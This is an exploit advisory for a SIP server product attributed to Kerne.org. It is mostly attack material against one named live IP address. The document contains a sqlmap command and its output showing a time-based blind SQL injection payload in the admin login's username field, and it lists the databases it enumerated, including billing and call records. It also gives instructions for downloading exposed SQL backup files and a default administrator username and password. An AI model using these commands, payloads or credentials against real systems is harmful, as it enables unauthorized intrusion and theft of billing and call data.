SIP Server by Kerne.org - Multiple Vulnerabilties
===================================================================

####################################################################
.:. Author         : AtT4CKxT3rR0r1ST
.:. Contact        : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home           : http://www.iphobos.com/blog/
.:. Script         : Kerne.org
####################################################################

[1] Time-Based Blind Injection [POST]
========================================
sqlmap.py -u "http://177.129.8.146/admin/index.php"
--data="action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" -p
"username" --level=5 --risk=5 --dbs


sqlmap identified the following injection points with a total of 1751
HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12"
AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s)
requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12"
AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
available databases [5]:
[*] billing
[*] cdr
[*] information_schema
[*] proftpd
[*] test


[2] Backup download
====================
Go To [http://177.129.8.146/admin/sql/]

You Find Sql Files And Download

[3] Default Data Admin Login:
==============================

Username: Operations
Password: k3cn18